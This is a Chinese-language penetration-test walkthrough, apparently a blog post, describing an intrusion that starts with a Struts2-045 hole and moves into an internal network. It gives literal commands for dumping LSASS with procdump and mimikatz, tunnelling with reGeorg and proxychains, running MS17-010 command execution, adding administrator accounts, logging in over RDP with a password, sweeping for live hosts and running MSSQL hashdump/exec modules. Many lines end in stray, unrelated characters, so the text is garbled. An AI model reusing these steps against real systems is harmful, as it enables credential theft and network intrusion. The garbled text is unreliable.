前言
某次測(cè)試一網(wǎng)站發(fā)現(xiàn)struts2-045漏洞喘漏。通過翻看文件夾上傳文件到不同端口進(jìn)行訪問。
進(jìn)而getshell菜刀連接争舞。
同樣查看權(quán)限士修,添加用戶遠(yuǎn)程連接枷遂。
在添加到管理員組的時(shí)候遇到阻礙。
server 2003的服務(wù)器棋嘲。
查看進(jìn)程tasklist酒唉。。好像是安全狗沸移。
在經(jīng)過反復(fù)查找資料后痪伦,使用Procdump+Mimikatz直接獲取管理員的密碼。
參考資料:利用Procdump+Mimikatz獲取Windows帳戶密碼
直接上傳procdump工具阔籽。運(yùn)行的條件為system流妻。(版本為server 2003牲蜀,不會(huì)被殺)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
將導(dǎo)出的lsass.dmp文件下載到本地笆制。
這里使用mimikatz工具進(jìn)行讀取密碼的時(shí)候,出現(xiàn)了錯(cuò)誤涣达。
換一臺(tái)機(jī)器在辆,使用windows server 2003重新進(jìn)行讀取,果然可以度苔。
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
獲取到的密碼進(jìn)行遠(yuǎn)程登錄匆篓。依然不對(duì)。
查看一下端口是否被修改寇窑。
tasklist? /svc? ? 查看TermService服務(wù)
netstat? -ano | find "2212"? ? 查看3389的端口
okQ桓拧!甩骏!
完美繞過卡巴斯基窗市、安全狗先慷。
注:一臺(tái)服務(wù)器多個(gè)IP
內(nèi)網(wǎng)滲透
使用reGeorg+Proxifier進(jìn)行內(nèi)網(wǎng)滲透。咨察。
使用kali運(yùn)行reGeorg文件论熙。
然后配置proxychains。摄狱。
vim /etc/proxychains.conf
就可以將kali的一些工具代理進(jìn)內(nèi)網(wǎng)脓诡,比如metasploit、nmap媒役。
ms17-010
使用任何工具前面添加proxychains即可祝谚。
先對(duì)該11.0.0.1/24網(wǎng)段掃描一下ms17-010。酣衷。
use? auxiliary/scanner/smb/smb_ms17_010
掃描發(fā)現(xiàn)多臺(tái)服務(wù)器存在ms17-010漏洞踊跟,但無法反彈shell。鸥诽。
命令執(zhí)行
那嘗試使用ms17-010的執(zhí)行系統(tǒng)命令的模塊商玫。
use auxiliary/admin/smb/ms17_010_command
命令執(zhí)行批量給幾臺(tái)服務(wù)器添加了admin管理員。
巧合的是該服務(wù)器還是域服務(wù)器牡借,安裝了卡巴斯基殺毒拳昌。。導(dǎo)致上傳的exe馬或mimikatz工具都被殺钠龙。
難怪無法反彈shell炬藤。。
后發(fā)現(xiàn)該網(wǎng)段大部分服務(wù)器都打了補(bǔ)丁碴里、裝了殺毒沈矿。
注:使用procdump+mimikatz同樣可以獲取windows帳戶密碼
還有一臺(tái)11.0.0.50服務(wù)器。
可以通過rdesktop工具訪問咬腋。羹膳。
proxychains rdesktop -u admin -p 1234qwer.. 11.0.0.50 -g 1024*800
該服務(wù)器未安裝卡巴斯基,可以上傳mimikatz工具獲取管理員密碼根竿。
privilege::debug? 提升權(quán)限
sekurlsa::logonpasswords? 抓取密碼
存活主機(jī)
使用for循環(huán)判斷該網(wǎng)段存活主機(jī)陵像。
for /l? %i? in (1,1,255) do @? ping? 11.0.0.%i? -w? 1? -n? 1 |? find? /i? "ttl="
弱口令
可以上傳hsscan工具。寇壳。掃描該網(wǎng)段常見服務(wù)的一些弱口令醒颖。
配合弱口令,通過msf的mssql一些模塊執(zhí)行命令壳炎。
use auxiliary/scanner/mssql/mssql_hashdump
use auxiliary/admin/mssql/mssql_exec
嘗試執(zhí)行系統(tǒng)命令泞歉,添加用戶。
獲得11.0.0.18的服務(wù)器。
